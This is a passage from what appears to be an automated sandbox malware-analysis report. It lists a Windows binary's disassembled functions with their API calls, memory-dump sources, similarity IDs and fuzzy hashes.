                                                            • EncodePointer.KERNEL32(00000000), ref: 001C42CA
                                                            • DecodePointer.KERNEL32(001C41B8), ref: 001C42E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 75b8e9ea6f29ad893e9bfae759bf968ad068f65dca46d080b74f14f17bfc4d0f
                                                            • Instruction ID: c899799d27671cd5ced0e097e9220ebcc4de6d0597a58704a5e60cbe5747b065
                                                            • Opcode Fuzzy Hash: 75b8e9ea6f29ad893e9bfae759bf968ad068f65dca46d080b74f14f17bfc4d0f
                                                            • Instruction Fuzzy Hash: 89E0B6B8595300FBEB60ABA0FE0DB443AB4B726B42F1090B8F045E50A0CBF48595CB54
                                                            Function 0020675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
                                                            • Instruction ID: 3fd0970c043111149f8ecf54edfcbf2a2eb26b433cbbc69d9a9f7a39838b5688
                                                            • Opcode Fuzzy Hash: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
                                                            • Instruction Fuzzy Hash: C2619B3451065AABDF11EF60CC85EFE77A8AF26308F044519F8555B1D3DB30E965CB60
                                                            Function 0022046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 002210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220548
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00220588
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002205AB
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002205D4
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00220617
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00220624
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 0c6d329a5cf948eb428523b1d7977d5287f8b9090faa19b0a8b9fb208a3a4b68
                                                            • Instruction ID: 50c41b8503188d0823c4dcaebdd8f99eb69f6511af7e9956d7f4fb54de9a62d3
                                                            • Opcode Fuzzy Hash: 0c6d329a5cf948eb428523b1d7977d5287f8b9090faa19b0a8b9fb208a3a4b68
                                                            • Instruction Fuzzy Hash: EB515A31118200AFC710EFA4D885E6FBBE9FF99314F04492DF545871A2DB71EA25CB52
                                                            Function 00225A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00225A82
                                                            • GetMenuItemCount.USER32(00000000), ref: 00225AB9
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00225AE1
                                                            • GetMenuItemID.USER32(?,?), ref: 00225B50
                                                            • GetSubMenu.USER32(?,?), ref: 00225B5E
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00225BAF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: fbbea181665c646302db13af34d88c4ee2cd32097ccf165dc13090f0ab44e9a3
                                                            • Instruction ID: a71d66cbf72cd639a60a3ac485168d4edc57d11a7fd010e3cb46c56da7ad73c8
                                                            • Opcode Fuzzy Hash: fbbea181665c646302db13af34d88c4ee2cd32097ccf165dc13090f0ab44e9a3
                                                            • Instruction Fuzzy Hash: 34518F35A10626EFCF11EFA4D845AAEB7B4EF58324F1084A9F811B7351CB74AE518B90
                                                            Function 001FF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 001FF3F7
                                                            • VariantClear.OLEAUT32(00000013), ref: 001FF469
                                                            • VariantClear.OLEAUT32(00000000), ref: 001FF4C4
                                                            • _memmove.LIBCMT ref: 001FF4EE
                                                            • VariantClear.OLEAUT32(?), ref: 001FF53B
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001FF569
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: 7e18155a194f2fdb6f7f8458ed09f50c4f9f1dccd7ecc0b0f5002126d57ee3b0
                                                            • Instruction ID: c2ea17260c6726ad46ed6580aadaaf66a9e6ba10fe53b2d3ca2be34c9292c958
                                                            • Opcode Fuzzy Hash: 7e18155a194f2fdb6f7f8458ed09f50c4f9f1dccd7ecc0b0f5002126d57ee3b0
                                                            • Instruction Fuzzy Hash: 2B5158B5A00209AFCB14DF58D884AAAB7B9FF4C314F158169EA59DB310D770E912CBA0
                                                            Function 002026F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202747
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00202792
                                                            • IsMenu.USER32(00000000), ref: 002027B2
                                                            • CreatePopupMenu.USER32 ref: 002027E6
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00202844
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00202875
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 53201d12facd2b2c113c78097a12378f4040092ba43dddfa8d04ff9289680bf5
                                                            • Instruction ID: d0a7ae81ebfb938ba6666c79e6a2c0397278e64191ffea9f5d552758a832e774
                                                            • Opcode Fuzzy Hash: 53201d12facd2b2c113c78097a12378f4040092ba43dddfa8d04ff9289680bf5
                                                            • Instruction Fuzzy Hash: 2051A274910306EFDF25CF68D98CAADBBF4AF44314F14816BE811AB2D2D7708928CB61
                                                            Function 001A1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 001A179A
                                                            • GetWindowRect.USER32(?,?), ref: 001A17FE
                                                            • ScreenToClient.USER32(?,?), ref: 001A181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A182C
                                                            • EndPaint.USER32(?,?), ref: 001A1876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: b42002a726ff904679915899620d5a59f60b92b4713c07d458210a1d26230344
                                                            • Instruction ID: 8e0efad97d867fb64266eb430aa4e016dde1bca4ce22970a4934c4fa4e45a6e6
                                                            • Opcode Fuzzy Hash: b42002a726ff904679915899620d5a59f60b92b4713c07d458210a1d26230344
                                                            • Instruction Fuzzy Hash: 5A41CC34504300AFC720DF64DC88FBA7BF8EB4A724F144629F9A58B2A1C7709849DB61
                                                            Function 0022B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(002667B0,00000000,00B96640,?,?,002667B0,?,0022B862,?,?), ref: 0022B9CC
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0022B9F0
                                                            • ShowWindow.USER32(002667B0,00000000,00B96640,?,?,002667B0,?,0022B862,?,?), ref: 0022BA50
                                                            • ShowWindow.USER32(00000000,00000004,?,0022B862,?,?), ref: 0022BA62
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0022BA86
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0022BAA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 07f205c229ec85e2c46924aa66f0ef5cbfc62a90e69d8607080f48bc9ea740c8
                                                            • Instruction ID: fcb3e04e50d2957fd2695044df69bd585ec9459e3f02a5612f4f1b4aaef7771a
                                                            • Opcode Fuzzy Hash: 07f205c229ec85e2c46924aa66f0ef5cbfc62a90e69d8607080f48bc9ea740c8
                                                            • Instruction Fuzzy Hash: 73417230611252BFDB22CF94E589B957BE0FF05310F5841B9EA588F6A2C731A856CF90
                                                            Function 002173B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00215134,?,?,00000000,00000001), ref: 002173BF
                                                              • Part of subcall function 00213C94: GetWindowRect.USER32(?,?), ref: 00213CA7
                                                            • GetDesktopWindow.USER32 ref: 002173E9
                                                            • GetWindowRect.USER32(00000000), ref: 002173F0
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00217422
                                                              • Part of subcall function 002054E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0020555E
                                                            • GetCursorPos.USER32(?), ref: 0021744E
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002174AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 98a4a600ad76df8877f7e3156f46fff0f5d5d2698b55f86dd70b5c1392d1e59e
                                                            • Instruction ID: cbfeffeeaa4c5989238cb95be87d1e2589cf36fcf8c87744416cefaea2786c92
                                                            • Opcode Fuzzy Hash: 98a4a600ad76df8877f7e3156f46fff0f5d5d2698b55f86dd70b5c1392d1e59e
                                                            • Instruction Fuzzy Hash: 9131F272508316ABC730DF54D849F9BBBF9FF98304F000929F48997191C630E959CB92
                                                            Function 001F8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001F8608
                                                              • Part of subcall function 001F85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001F8612
                                                              • Part of subcall function 001F85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001F8621
                                                              • Part of subcall function 001F85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001F8628
                                                              • Part of subcall function 001F85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001F863E
                                                            • GetLengthSid.ADVAPI32(?,00000000,001F8977), ref: 001F8DAC
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001F8DB8
                                                            • HeapAlloc.KERNEL32(00000000), ref: 001F8DBF
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 001F8DD8
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,001F8977), ref: 001F8DEC
                                                            • HeapFree.KERNEL32(00000000), ref: 001F8DF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 6154d5093f84022032bd5cf8fe818343b2135d91181652919c9dcf4ff3084288
                                                            • Instruction ID: 47f80b6c18a2897ca5f024572e225d2a63ba5b7ef11bef1ff4a5098f212aa86f
                                                            • Opcode Fuzzy Hash: 6154d5093f84022032bd5cf8fe818343b2135d91181652919c9dcf4ff3084288
                                                            • Instruction Fuzzy Hash: 7A11BE31A00609FFDB649FE4DD09BBE7BB9FF55315F104029E94997290CB329901CB60
                                                            Function 001F8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001F8B2A
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 001F8B31
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001F8B40
                                                            • CloseHandle.KERNEL32(00000004), ref: 001F8B4B
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001F8B7A
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 001F8B8E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 9c8980d53db34b90356a6aa67c2c74d10354279f4467b1e5fcf917be07034053
                                                            • Instruction ID: 08e57ef4275b5cd686048b29a8e23f748ac1f15758b8ecf86bea1810b80e2734
                                                            • Opcode Fuzzy Hash: 9c8980d53db34b90356a6aa67c2c74d10354279f4467b1e5fcf917be07034053
                                                            • Instruction Fuzzy Hash: 5C1147B250024DBBDB118FA4ED49FEA7BB9EB08304F045065FE04A6160C7728E61EB60
                                                            Function 0022C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001A134D
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A135C
                                                              • Part of subcall function 001A12F3: BeginPath.GDI32(?), ref: 001A1373
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A139C
                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0022C1C4
                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0022C1D8
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0022C1E6
                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0022C1F6
                                                            • EndPath.GDI32(00000000), ref: 0022C206
                                                            • StrokePath.GDI32(00000000), ref: 0022C216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: 6a5cfaebf41aa3725fbbe670cace2cb01a964d6f7f6f24a026460049d113399a
                                                            • Instruction ID: 44fa4ab0fa0352d34328aeaa50cb38928d2c235c4fa77adb44a816ccd243f476
                                                            • Opcode Fuzzy Hash: 6a5cfaebf41aa3725fbbe670cace2cb01a964d6f7f6f24a026460049d113399a
                                                            • Instruction Fuzzy Hash: 5C11097640010DBFDF119F90ED88EAA7FADEB08354F148025FE189A162C7719E65DBA0
                                                            Function 001C03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C03D3
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 001C03DB
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C03E6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C03F1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 001C03F9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001C0401
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: fb379be1047f6b554860eb73e962836d05403a3f6fedbaf079f034ccd53be256
                                                            • Instruction ID: 05dfb9a21124e21a2c0b56c8144b04c8eade86f53a4871c99c53256d6d48790a
                                                            • Opcode Fuzzy Hash: fb379be1047f6b554860eb73e962836d05403a3f6fedbaf079f034ccd53be256
                                                            • Instruction Fuzzy Hash: 800148B09027597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7B5A868CBE5
                                                            Function 0020568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0020569B
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002056B1
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 002056C0
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002056CF
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002056D9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002056E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 513d3a02a1632aedd234554f0369134e0a56fb3384f5298bf17c1672aa4ba586
                                                            • Instruction ID: 4a0b7a3d150bac95de2523d00d77b3fa20c67c9eba4bc665d539c80ee9990453
                                                            • Opcode Fuzzy Hash: 513d3a02a1632aedd234554f0369134e0a56fb3384f5298bf17c1672aa4ba586
                                                            • Instruction Fuzzy Hash: 6DF06D32241158BBE3315BA2EE0EEFB7A7CEBCAB11F000179FA04D109096A11A1286B5
                                                            Function 002074D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 002074E5
                                                            • EnterCriticalSection.KERNEL32(?,?,001B1044,?,?), ref: 002074F6
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,001B1044,?,?), ref: 00207503
